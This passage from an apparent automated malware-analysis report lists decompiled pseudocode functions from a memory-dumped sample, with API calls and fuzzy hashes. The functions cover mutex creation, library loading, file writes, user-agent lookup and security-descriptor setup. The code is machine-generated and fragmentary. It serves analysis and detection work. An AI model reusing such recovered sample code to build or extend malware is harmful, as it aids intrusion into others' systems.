    							E036085A8( &_v8);
    							_t7 = E036085EA(0x100);
    							 *0x361e6f0 = _t7;
    							if(_t7 != 0) {
    								 *0x361e6fc = 0;
    								_t9 = E036085EA(0x401);
    								 *0x361e6d4 = _t9;
    								__eflags = _t9;
    								if(_t9 != 0) {
    									__eflags =  *0x361e6c0; // 0x0
    									if(__eflags == 0) {
    										E036115C1(0x36081e8, 0x36081f1);
    									}
    									_push(0x61e);
    									_t24 = 8;
    									_t10 = E0360E1C7(0x361bd14, _t24); // executed
    									 *0x361e6a0 = _t10;
    									_t4 = 0;
    								} else {
    									_push(0xfffffffc);
    									goto L5;
    								}
    							} else {
    								_push(0xfffffffe);
    								L5:
    								_pop(_t4);
    							}
    						}
    					}
    				}
    				return _t4;
    			}










    APIs
    • CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,?,?,036056EF), ref: 03601545
    • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,036056EF), ref: 0360155B
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateMutex$AllocateHeap
    • String ID:
    • API String ID: 704353917-0
    • Opcode ID: ca3deb4c26a7edf3beea10f1fbad92f583c71991c4e3cf843aba728ba3c908c3
    • Instruction ID: 9592dfeb5c1365b579b4e7c98e4d6e481c1117932b1190336efbfeb3d2e1aff4
    • Opcode Fuzzy Hash: ca3deb4c26a7edf3beea10f1fbad92f583c71991c4e3cf843aba728ba3c908c3
    • Instruction Fuzzy Hash: 2A11E97C614302AAD71EEBB6AD1691B3AA4DB8376175C052FE811CB2C8FF71C4108654
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E0360E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
    				char _v8;
    				char _t5;
    				struct HINSTANCE__* _t7;
    				void* _t10;
    				void* _t12;
    				void* _t22;
    				void* _t25;
    
    				_push(__ecx);
    				_t12 = __ecx;
    				_t22 = __edx;
    				_t5 = E036095AD(_a4);
    				_t25 = 0;
    				_v8 = _t5;
    				_push(_t5);
    				if(_a4 != 0x7c3) {
    					_t7 = LoadLibraryA(); // executed
    				} else {
    					_t7 = GetModuleHandleA();
    				}
    				if(_t7 != 0) {
    					_t10 = E0360E17C(_t12, _t22, _t7); // executed
    					_t25 = _t10;
    				}
    				E036085A8( &_v8);
    				return _t25;
    			}










    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0361BA20), ref: 0360E1E9
    • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,0361BA20), ref: 0360E1F6
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID:
    • API String ID: 4133054770-0
    • Opcode ID: 595495d3018a9de0d537a0941d2bcd5f4a000f4528e5b6a46642a8c23019a570
    • Instruction ID: f44461b2567c0f169fe28b79ade96852b7ca5645c1ec49ac2a3e64ddad65149b
    • Opcode Fuzzy Hash: 595495d3018a9de0d537a0941d2bcd5f4a000f4528e5b6a46642a8c23019a570
    • Instruction Fuzzy Hash: EEF0A731700224ABD70CEBADE88689BF7EC9F85691714447EF406D72D1DA71DE4087E4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E03602C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
    				WCHAR* _v8;
    				char _v12;
    				char _v44;
    				char _v564;
    				char _v1084;
    				void* __esi;
    				void* _t23;
    				struct _SECURITY_ATTRIBUTES* _t25;
    				int _t27;
    				char _t32;
    				char _t38;
    				intOrPtr _t39;
    				void* _t40;
    				WCHAR* _t41;
    				void* _t54;
    				char* _t60;
    				char* _t63;
    				void* _t70;
    				WCHAR* _t71;
    				intOrPtr* _t73;
    
    				_t70 = __ecx;
    				_push(__ecx);
    				E0360B6E6(__edx,  &_v44, __eflags, __fp0);
    				_t52 = _t70;
    				if(E0360BB73(_t70) == 0) {
    					_t23 = E03602BA4( &_v1084, _t70, 0x104); // executed
    					_pop(_t54);
    					__eflags = _t23;
    					if(__eflags == 0) {
    						_t71 = E03602C64( &_v1084, __eflags);
    					} else {
    						E0360AFF8(_t54,  &_v564); // executed
    						_t32 = E0360109A(_t54, 0x375);
    						_push(0);
    						_v12 = _t32;
    						_push( &_v44);
    						_t60 = "\\";
    						_push(_t60);
    						_push(_t32);
    						_push(_t60);
    						_push( &_v564);
    						_push(_t60);
    						_t71 = E036092CB( &_v1084);
    						E036085BB( &_v12);
    					}
    				} else {
    					_t38 = E0360109A(_t52, 0x4e0);
    					 *_t73 = 0x104;
    					_v12 = _t38;
    					_t39 =  *0x361e684; // 0x530f6c8
    					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
    					_t78 = _t40;
    					if(_t40 != 0) {
    						_t41 = E0360109A( &_v564, 0x375);
    						_push(0);
    						_v8 = _t41;
    						_push( &_v44);
    						_t63 = "\\";
    						_push(_t63);
    						_push(_t41);
    						_push(_t63);
    						_t71 = E036092CB( &_v564);
    						E036085BB( &_v8);
    					} else {
    						_t71 = E03602C64( &_v44, _t78);
    					}
    					E036085BB( &_v12);
    				}
    				_v8 = _t71;
    				_t25 = E0360B24F(_t71);
    				if(_t25 == 0) {
    					_t27 = CreateDirectoryW(_t71, _t25); // executed
    					if(_t27 == 0 || E0360B24F(_t71) == 0) {
    						E03608600( &_v8, 0xfffffffe);
    						_t71 = _v8;
    					}
    				}
    				return _t71;
    			}























    APIs
    • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 03602DA1
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateDirectory
    • String ID:
    • API String ID: 4241100979-0
    • Opcode ID: 5f787b4d7c0d7291ba34846423b95cf8796331e3ad30a5d50e1f93ef09707718
    • Instruction ID: 51fffa9b6e67efb5ed6772d79dc64d83fd4defa33b3f922de68bd324106cd951
    • Opcode Fuzzy Hash: 5f787b4d7c0d7291ba34846423b95cf8796331e3ad30a5d50e1f93ef09707718
    • Instruction Fuzzy Hash: A23186B5A10314ABDB1CEBA0CD66AEF72ACAF14610F04055DE515EB2C0EF709F4487A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E03605AE7(intOrPtr __edx, void* __fp0) {
    				short _v30;
    				short _v32;
    				short _v34;
    				short _v36;
    				intOrPtr* _t22;
    				intOrPtr _t23;
    				signed int _t30;
    				intOrPtr _t38;
    				intOrPtr* _t40;
    				intOrPtr _t44;
    				intOrPtr _t45;
    				intOrPtr* _t46;
    				signed int _t47;
    				void* _t55;
    
    				_t55 = __fp0;
    				_t45 = __edx;
    				_t47 = 0;
    				_t22 = E036085EA(0x14);
    				_t38 =  *0x361e688; // 0x33f0000
    				_t46 = _t22;
    				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
    					_v36 =  *((intOrPtr*)(_t38 + 0x228));
    					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
    					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
    					_v30 = 0;
    					GetDriveTypeW( &_v36); // executed
    				}
    				 *_t46 = 2;
    				 *(_t46 + 4) = _t47;
    				_t23 =  *0x361e688; // 0x33f0000
    				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
    				_t40 = E03605A63( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
    				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
    				if(_t40 == 0) {
    					L9:
    					if(E03602DCB() == 0) {
    						goto L11;
    					} else {
    						_t47 = _t47 | 0xffffffff;
    					}
    				} else {
    					_t45 =  *_t40;
    					_t30 = _t47;
    					if(_t45 == 0) {
    						goto L9;
    					} else {
    						_t44 =  *((intOrPtr*)(_t40 + 4));
    						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
    							_t30 = _t30 + 1;
    							if(_t30 < _t45) {
    								continue;
    							} else {
    								goto L9;
    							}
    							goto L12;
    						}
    						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
    							L11:
    							E03604D6E(_t46, _t45, _t55);
    						} else {
    							goto L9;
    						}
    					}
    				}
    				L12:
    				E0360A384();
    				E0360A384();
    				return _t47;
    			}

















    APIs
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • GetDriveTypeW.KERNELBASE(?), ref: 03605B37
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocateDriveHeapType
    • String ID:
    • API String ID: 414167704-0
    • Opcode ID: f95afbd9f8269c5ab1bbda0ea653bf49e63f1058ac22f72e1ae96b257b0d6e70
    • Instruction ID: 0e93d540ee823d7e7dc3fc09434fe63ef06b55638a39f4933bcff7446b4b701d
    • Opcode Fuzzy Hash: f95afbd9f8269c5ab1bbda0ea653bf49e63f1058ac22f72e1ae96b257b0d6e70
    • Instruction Fuzzy Hash: 2A21F3386003069BC71CEBA4D4599BBB374FF09760B18412ED9168B7C0EB71A842CF89
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E0360E45B(void* __ecx, void* __edx) {
    				char _v8;
    				intOrPtr* _t5;
    				intOrPtr _t10;
    				intOrPtr* _t11;
    				void* _t12;
    
    				_push(__ecx);
    				_t5 =  *0x361e6b0; // 0x530fdd8
    				if( *_t5 == 0) {
    					_v8 = E036095AD(0x2a7);
    					 *0x361e788 = E0360918C(_t6, 0);
    					E036085A8( &_v8);
    					goto L4;
    				} else {
    					_v8 = 0x100;
    					_t10 = E036085EA(0x101);
    					 *0x361e788 = _t10;
    					_t11 =  *0x361e6b0; // 0x530fdd8
    					_t12 =  *_t11(0, _t10,  &_v8); // executed
    					if(_t12 == 0) {
    						L4:
    						return 0;
    					} else {
    						return E03608600(0x361e788, 0xffffffff) | 0xffffffff;
    					}
    				}
    			}








    APIs
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0360E502), ref: 0360E48C
      • Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: Heap$AgentAllocateFreeObtainStringUser
    • String ID:
    • API String ID: 471734292-0
    • Opcode ID: 173143e4a12fb1e5055a7bb97671ec664e872bbc9fa7072a93b6bd5fa238962d
    • Instruction ID: 3c2d4d5d71899549cc0e0da06a7ffa1e0f05b014b3e29ee2058b4881507786f7
    • Opcode Fuzzy Hash: 173143e4a12fb1e5055a7bb97671ec664e872bbc9fa7072a93b6bd5fa238962d
    • Instruction Fuzzy Hash: 54F0AF31704200EBF74DEBB4E80AA5AB7E0AB45320F68465DE411972C4EAB19900D628
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0360A642(void* __ecx, void* __edx, intOrPtr _a4) {
    				long _v8;
    				void* _v12;
    				void* _t13;
    				void* _t21;
    				void* _t23;
    				void* _t26;
    
    				_t23 = __ecx;
    				_push(__ecx);
    				_push(__ecx);
    				_t26 = 0;
    				_v12 = __ecx;
    				_t21 = __edx;
    				if(_a4 == 0) {
    					L3:
    					_t13 = 1;
    				} else {
    					while(1) {
    						_v8 = _v8 & 0x00000000;
    						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
    							break;
    						}
    						_t26 = _t26 + _v8;
    						_t23 = _v12;
    						if(_t26 < _a4) {
    							continue;
    						} else {
    							goto L3;
    						}
    						goto L4;
    					}
    					_t13 = 0;
    				}
    				L4:
    				return _t13;
    			}









    APIs
    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,03608F37,?), ref: 0360A66F
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: FileWrite
    • String ID:
    • API String ID: 3934441357-0
    • Opcode ID: 788ce177d4dce515f011cee1b40bcd31289b55ba6955f2e0ae359b46d44fa173
    • Instruction ID: 4f4a0d32265de4fcc6d401ef75b0360962da9dd01b272b871e2d62f146e28179
    • Opcode Fuzzy Hash: 788ce177d4dce515f011cee1b40bcd31289b55ba6955f2e0ae359b46d44fa173
    • Instruction Fuzzy Hash: 11F01D72A20218BFDB14DFE8C989BEFB7BCEB05684F154169B509E7144D6B0EA4087A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E03608600(char _a4, intOrPtr _a8) {
    				char _t3;
    				intOrPtr _t4;
    				void* _t9;
    
    				_t3 = _a4;
    				if(_t3 == 0) {
    					return _t3;
    				}
    				_t9 =  *_t3;
    				if(_t9 != 0) {
    					 *_t3 =  *_t3 & 0x00000000;
    					_t4 = _a8;
    					if(_t4 != 0xffffffff) {
    						if(_t4 == 0xfffffffe) {
    							_t4 = E0360C39D(_t9);
    						}
    					} else {
    						_t4 = E0360C384(_t9);
    					}
    					E03608735(_t9, 0, _t4);
    					_t3 = RtlFreeHeap( *0x361e768, 0, _t9); // executed
    				}
    				return _t3;
    			}






    APIs
    • RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 8f0376326f08850893c31066dbdf0ab08f12d76df36e931c5c2c0d5381949569
    • Instruction ID: 2d910614e8d0ed281b8665405f1b5a10593c1955bdbe4261c57b623ea2264345
    • Opcode Fuzzy Hash: 8f0376326f08850893c31066dbdf0ab08f12d76df36e931c5c2c0d5381949569
    • Instruction Fuzzy Hash: E0F0A7315216186BD718E6249C46F9F33588F01671F190245F9189F2C0D7309D208699
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360A5DD(WCHAR* __ecx, long __edx) {
    				intOrPtr _t6;
    				long _t12;
    				void* _t13;
    
    				_t12 = __edx;
    				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
    				if(_t13 != 0xffffffff) {
    					if(_t12 == 4) {
    						_t6 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
    					}
    					return _t13;
    				}
    				return 0;
    			}






    APIs
    • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,03608F1F), ref: 0360A5F8
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 321f24e584daee2499a96190aa097cccd21aa512bad09b4b5cda8b234bde6340
    • Instruction ID: 2a041d87abf459b9124cd9f6ed251265a4e52cf2a5d1990635c601e54caf3832
    • Opcode Fuzzy Hash: 321f24e584daee2499a96190aa097cccd21aa512bad09b4b5cda8b234bde6340
    • Instruction Fuzzy Hash: A1E0D8B23102147FE72455A8DDC9F7B166CE7856F9F090275F611C31C0C110CC104670
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360A763(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				signed int _t5;
    				void* _t6;
    				void* _t10;
    				void* _t15;
    				void* _t17;
    
    				_t15 = 2;
    				_t5 = E0360A5DD(_a4, _t15);
    				_t17 = _t5;
    				if(_t17 != 0) {
    					_t6 = E0360A642(_t17, _a8, _a12); // executed
    					if(_t6 != 0) {
    						FindCloseChangeNotification(_t17);
    						return 0;
    					}
    					_t10 = 0xfffffffe;
    					return _t10;
    				}
    				return _t5 | 0xffffffff;
    			}








    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: ee97144db5eabfd3acd6dc4a8f92043bf581b59f2e01b01b3d255a9994caf9a9
    • Instruction ID: 063ca9205e437c8ee70214506d8a86d59c1644108f43cbd4f93701001c7cd5d0
    • Opcode Fuzzy Hash: ee97144db5eabfd3acd6dc4a8f92043bf581b59f2e01b01b3d255a9994caf9a9
    • Instruction Fuzzy Hash: F2E0923A21472567CB2AEAE8D95A89F3769EF452F07608656F826CF2C0DA30D8014684
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360988C(void* __eflags, intOrPtr _a4) {
    				intOrPtr _t24;
    
    				_t24 = _a4;
    				if(E0360A4A5( *(_t24 + 0x1c), 0x3a98) >= 0) {
    					FindCloseChangeNotification( *(_t24 + 0x1c));
    					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
    					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
    						E03609830(_t24, 1);
    					}
    					return  *((intOrPtr*)(_t24 + 0x18));
    				}
    				return 0;
    			}




    APIs
    • FindCloseChangeNotification.KERNELBASE(?), ref: 036098B0
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID:
    • API String ID: 2591292051-0
    • Opcode ID: ad345dca2d7823ba0639d06d203f9a53b2f2da54a634f4f8d6c6dd33287c5247
    • Instruction ID: 05a5cb431706ad225a1f727dc34bc152d23dbabd9976355fdafd766da4d35e8b
    • Opcode Fuzzy Hash: ad345dca2d7823ba0639d06d203f9a53b2f2da54a634f4f8d6c6dd33287c5247
    • Instruction Fuzzy Hash: 72F0A0302007009FD738EF26D884957BBEBEF453507048D2DE98287AA2D731F8058790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0360B31D(void* __ecx) {
    				intOrPtr _t4;
    				void* _t5;
    				intOrPtr _t6;
    				void* _t12;
    				void* _t13;
    
    				_t4 =  *0x361e684; // 0x530f6c8
    				_t13 = 0;
    				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
    				_t12 = _t5;
    				if(_t12 != 0) {
    					_t6 =  *0x361e684; // 0x530f6c8
    					_push(_t12);
    					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
    						_t13 = 1;
    					}
    					FindCloseChangeNotification(_t12);
    					return _t13;
    				}
    				return _t5;
    			}








    APIs
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,03603C8B,?,?,?,?,?,?,?,?,03603D70,00000000), ref: 0360B350
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID:
    • API String ID: 2591292051-0
    • Opcode ID: a38540f719fbf89f042d2d1e89455389391e9db365acf451a18cd1c0aea1fc22
    • Instruction ID: 495271a09b9e370350f128625121af0ac14916b95e4941fde7a8dbb058939df6
    • Opcode Fuzzy Hash: a38540f719fbf89f042d2d1e89455389391e9db365acf451a18cd1c0aea1fc22
    • Instruction Fuzzy Hash: 70E0DF323102209BC3289B69A80CF67BA68EB86A50B0A416DF908C7249CB21C802C7E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0360A621(WCHAR* __ecx) {
    				signed int _t5;
    
    				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
    				_t2 = _t5 + 1; // 0x1
    				asm("sbb ecx, ecx");
    				return _t5 &  ~_t2;
    			}




    APIs
    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0360A6AF,00000000,00000400,00000000,0360F8C0,0360F8C0,?,0360FA61,00000000), ref: 0360A635
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: be6da393e9089491387db3393d6e9b878679d1343869e0da6d1879033a15acc0
    • Instruction ID: 75b1e76f114c1ef42b479d0a59f48b1965acf3b3dbcab3dd7a4889816955f976
    • Opcode Fuzzy Hash: be6da393e9089491387db3393d6e9b878679d1343869e0da6d1879033a15acc0
    • Instruction Fuzzy Hash: 2ED012B13A0200BEFB2C9A34CD5AF72329CD700701F26025C7A06EA0D1CA6AE9148720
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E036049A6() {
    				int _t3;
    				void* _t4;
    
    				_t3 = FindCloseChangeNotification( *0x361e748);
    				_t4 =  *0x361e748; // 0x0
    				_t5 =  !=  ? 0 : _t4;
    				 *0x361e748 =  !=  ? 0 : _t4;
    				return _t3;
    			}





    APIs
    • FindCloseChangeNotification.KERNELBASE(03605095), ref: 036049B1
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID:
    • API String ID: 2591292051-0
    • Opcode ID: a52a07763c1f1d2145352f43ecb6dc35244e45853f68837fbc3d7fd531ff7009
    • Instruction ID: 7ce56543ff306d3ebf183a3d05364128fecb6ba01d247d95aa9fa35a36b48ca5
    • Opcode Fuzzy Hash: a52a07763c1f1d2145352f43ecb6dc35244e45853f68837fbc3d7fd531ff7009
    • Instruction Fuzzy Hash: 1AC002B26116099FFB08EB2AE858815B7E6EB8820135D706BF8028662DD732D851DA00
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360B24F(WCHAR* __ecx) {
    
    				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
    			}



    APIs
    • GetFileAttributesW.KERNELBASE(00000000,03604E7E,?,00000000), ref: 0360B255
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: b3ddb044b8b5fdec8615cdd9e1076b0e27ba579cf0b5cc6372bdabab15a14b2f
    • Instruction ID: e7f6f2d2a6acfc9e2c00c7b5c44359d1839af0e4cb86108108badaa727fe6d86
    • Opcode Fuzzy Hash: b3ddb044b8b5fdec8615cdd9e1076b0e27ba579cf0b5cc6372bdabab15a14b2f
    • Instruction Fuzzy Hash: BDB012B63301004FCB1C6B389984C4D32905F0D231366075DB033C60E5D731C860AB00
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E036085EA(long _a4) {
    				void* _t2;
    
    				_t2 = RtlAllocateHeap( *0x361e768, 8, _a4); // executed
    				return _t2;
    			}




    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 8c8258ab5fb3cd234b53df5f24ae31828c96ace8569d2116a82ec745c5a4fbbc
    • Instruction ID: f9b5bcfa4561c5c131073e97b9c8c4f42cab2771fd2e832599f0aa62d42b9ded
    • Opcode Fuzzy Hash: 8c8258ab5fb3cd234b53df5f24ae31828c96ace8569d2116a82ec745c5a4fbbc
    • Instruction Fuzzy Hash: 6BB0923248020CFBFB012A91EC09A84BF69E708756F04A012FA0C05069CA73A460DB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E036085D5() {
    				void* _t1;
    
    				_t1 = HeapCreate(0, 0x80000, 0); // executed
    				 *0x361e768 = _t1;
    				return _t1;
    			}




    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,03605F84), ref: 036085DE
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: e8887c0997dcd169034b4330fbc9850b8fe59dd8110589c07cd48c4f05b23144
    • Instruction ID: 0c6bced708b938e44ed9c7138609f082fe2a0b8fe69398de2164a4dba8540085
    • Opcode Fuzzy Hash: e8887c0997dcd169034b4330fbc9850b8fe59dd8110589c07cd48c4f05b23144
    • Instruction Fuzzy Hash: 80B012B068070056F3903B205D4AB003590A304B07F342002B708591CCC6A01000CA04
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E0360BCF6() {
    				char _v8;
    				void* _v12;
    				char _v16;
    				short _v20;
    				char _v24;
    				short _v28;
    				char _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				void _v96;
    				intOrPtr _t58;
    				intOrPtr _t61;
    				intOrPtr _t63;
    				intOrPtr _t65;
    				intOrPtr _t67;
    				intOrPtr _t70;
    				intOrPtr _t73;
    				intOrPtr _t77;
    				intOrPtr _t79;
    				intOrPtr _t81;
    				intOrPtr _t85;
    				intOrPtr _t87;
    				signed int _t90;
    				void* _t92;
    				intOrPtr _t93;
    				void* _t98;
    
    				_t90 = 8;
    				_v28 = 0xf00;
    				_v32 = 0;
    				_v24 = 0;
    				memset( &_v96, 0, _t90 << 2);
    				_v20 = 0x100;
    				_push( &_v12);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_v16 = 0;
    				_push(0);
    				_v8 = 0;
    				_push(1);
    				_v12 = 0;
    				_push( &_v24);
    				_t58 =  *0x361e68c; // 0x530f890
    				_t98 = 0;
    				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
    					L14:
    					if(_v8 != 0) {
    						_t67 =  *0x361e68c; // 0x530f890
    						 *((intOrPtr*)(_t67 + 0x10))(_v8);
    					}
    					if(_v12 != 0) {
    						_t65 =  *0x361e68c; // 0x530f890
    						 *((intOrPtr*)(_t65 + 0x10))(_v12);
    					}
    					if(_t98 != 0) {
    						_t63 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t63 + 0x34))(_t98);
    					}
    					if(_v16 != 0) {
    						_t61 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t61 + 0x34))(_v16);
    					}
    					L22:
    					return _t98;
    				}
    				_v68 = _v12;
    				_t70 =  *0x361e688; // 0x33f0000
    				_t92 = 2;
    				_v96 = 0x1fffff;
    				_v92 = 0;
    				_v88 = 3;
    				_v76 = 0;
    				_v72 = 5;
    				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
    					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
    						goto L7;
    					}
    					goto L4;
    				} else {
    					L4:
    					_push( &_v8);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(1);
    					_push(_t92);
    					_push(_t92);
    					_push( &_v32);
    					_t85 =  *0x361e68c; // 0x530f890
    					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
    						goto L14;
    					} else {
    						_t87 = _v8;
    						if(_t87 != 0) {
    							_push(2);
    							_pop(1);
    							_v64 = 0x1fffff;
    							_v60 = 1;
    							_v56 = 3;
    							_v44 = 0;
    							_v40 = 1;
    							_v36 = _t87;
    						}
    						L7:
    						_push( &_v16);
    						_push(0);
    						_push( &_v96);
    						_t73 =  *0x361e68c; // 0x530f890
    						_push(1); // executed
    						if( *((intOrPtr*)(_t73 + 8))() != 0) {
    							goto L14;
    						}
    						_t98 = LocalAlloc(0x40, 0x14);
    						if(_t98 == 0) {
    							goto L14;
    						}
    						_t93 =  *0x361e68c; // 0x530f890
    						_push(1);
    						_push(_t98);
    						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
    							goto L14;
    						}
    						_t77 =  *0x361e68c; // 0x530f890
    						_push(0);
    						_push(_v16);
    						_push(1);
    						_push(_t98);
    						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
    							goto L14;
    						}
    						if(_v8 != 0) {
    							_t81 =  *0x361e68c; // 0x530f890
    							 *((intOrPtr*)(_t81 + 0x10))(_v8);
    						}
    						_t79 =  *0x361e68c; // 0x530f890
    						 *((intOrPtr*)(_t79 + 0x10))(_v12);
    						goto L22;
    					}
    				}
    			}







































    APIs
    • LocalAlloc.KERNEL32(00000040,00000014), ref: 0360BDE8
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocLocal
    • String ID:
    • API String ID: 3494564517-0
    • Opcode ID: fd0893acc5b93fe0ffddc8dc8951f99c3798706946d6c9f53fe76d78a0d8b5f0
